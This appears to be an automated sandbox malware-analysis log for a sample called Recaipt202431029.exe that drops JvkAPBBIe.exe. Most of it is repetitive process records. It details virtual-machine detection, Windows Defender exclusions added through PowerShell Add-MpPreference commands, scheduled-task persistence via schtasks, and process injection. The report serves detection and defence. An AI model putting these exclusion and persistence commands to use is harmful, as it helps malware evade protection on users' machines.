            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            barindex
            Yara detected AntiVM3
            Source: Yara matchFile source: Process Memory Space: Recaipt202431029.exe PID: 5548, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: JvkAPBBIe.exe PID: 1532, type: MEMORYSTR
            Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
            Source: C:\Users\user\Desktop\Recaipt202431029.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\Desktop\Recaipt202431029.exeMemory allocated: B60000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeMemory allocated: 2580000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeMemory allocated: 2380000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeMemory allocated: 1630000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeMemory allocated: 30A0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeMemory allocated: 2E00000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeMemory allocated: E40000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeMemory allocated: 2C50000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeMemory allocated: 4C50000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeMemory allocated: 12B0000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeMemory allocated: 2D70000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeMemory allocated: 2AD0000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\Recaipt202431029.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7582Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7352Jump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeWindow / User API: threadDelayed 3591Jump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeWindow / User API: threadDelayed 6208Jump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exe TID: 5560Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1436Thread sleep time: -5534023222112862s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1576Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5240Thread sleep count: 7352 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6976Thread sleep count: 206 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6640Thread sleep time: -5534023222112862s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1272Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exe TID: 3596Thread sleep time: -30437127721620741s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exe TID: 6508Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exe TID: 3492Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\Recaipt202431029.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeFile Volume queried: C:\ FullSizeInformation
            Source: C:\Users\user\Desktop\Recaipt202431029.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeThread delayed: delay time: 922337203685477
            Source: Recaipt202431029.exe, 00000009.00000002.4568314491.0000000006A05000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll8
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Adds a directory exclusion to Windows Defender
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Recaipt202431029.exe"
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\JvkAPBBIe.exe"
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Recaipt202431029.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\JvkAPBBIe.exe"Jump to behavior
            Injects a PE file into a foreign processes
            Source: C:\Users\user\Desktop\Recaipt202431029.exeMemory written: C:\Users\user\Desktop\Recaipt202431029.exe base: 400000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeMemory written: C:\Users\user\AppData\Roaming\JvkAPBBIe.exe base: 400000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Recaipt202431029.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\JvkAPBBIe.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\JvkAPBBIe" /XML "C:\Users\user\AppData\Local\Temp\tmp912F.tmp"Jump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess created: C:\Users\user\Desktop\Recaipt202431029.exe "C:\Users\user\Desktop\Recaipt202431029.exe"Jump to behavior
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\JvkAPBBIe" /XML "C:\Users\user\AppData\Local\Temp\tmpA553.tmp"Jump to behavior
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeProcess created: C:\Users\user\AppData\Roaming\JvkAPBBIe.exe "C:\Users\user\AppData\Roaming\JvkAPBBIe.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeQueries volume information: C:\Users\user\Desktop\Recaipt202431029.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
